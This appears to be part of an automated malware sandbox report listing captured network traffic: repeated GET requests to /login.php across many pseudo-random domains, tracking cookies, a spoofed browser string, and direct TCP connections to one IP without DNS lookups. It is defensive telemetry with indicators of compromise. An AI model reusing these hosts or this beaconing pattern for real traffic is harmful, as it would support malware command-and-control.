Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comContent-Length: 6Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comContent-Length: 6Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comContent-Length: 6Cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comContent-Length: 6Cookie: vsid=926vr471977221402211128Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comContent-Length: 6Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comContent-Length: 6Cookie: btst=162891e75d1d854fb9d05e52998b5935\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.comContent-Length: 6Cookie: btst=0e9c6b135bbf78b20bee3c60ff917523\|8.46.123.33\|1724431636\|1724431636\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.comContent-Length: 6Cookie: btst=e67e5bdc7da6809b4e043748c6ce58a1\|8.46.123.33\|1724431658\|1724431658\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comContent-Length: 6Cookie: __tad=1724431658.5743798Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comContent-Length: 6Cookie: __tad=1724431658.5024510Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1724431658.5743798Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php?subid1=20240824-0248-365f-be38-e61788a8e181 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1724431658.5024510Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.comContent-Length: 6Cookie: btst=230ba644e827e5eb69b76dd744835699\|8.46.123.33\|1724431667\|1724431667\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.comContent-Length: 6Cookie: btst=61afe5b7d011093f87c495eec767f391\|8.46.123.33\|1724431669\|1724431669\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comContent-Length: 6Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78\|8.46.123.33\|1724431671\|1724431621\|25\|2\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comContent-Length: 6Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8\|8.46.123.33\|1724431672\|1724431621\|25\|2\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comContent-Length: 6Cookie: vsid=926vr471977221402211128Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comContent-Length: 6Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58\|8.46.123.33\|1724431671\|1724431621\|25\|2\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comContent-Length: 6Cookie: btst=162891e75d1d854fb9d05e52998b5935\|8.46.123.33\|1724431672\|1724431621\|25\|2\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comContent-Length: 6Cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
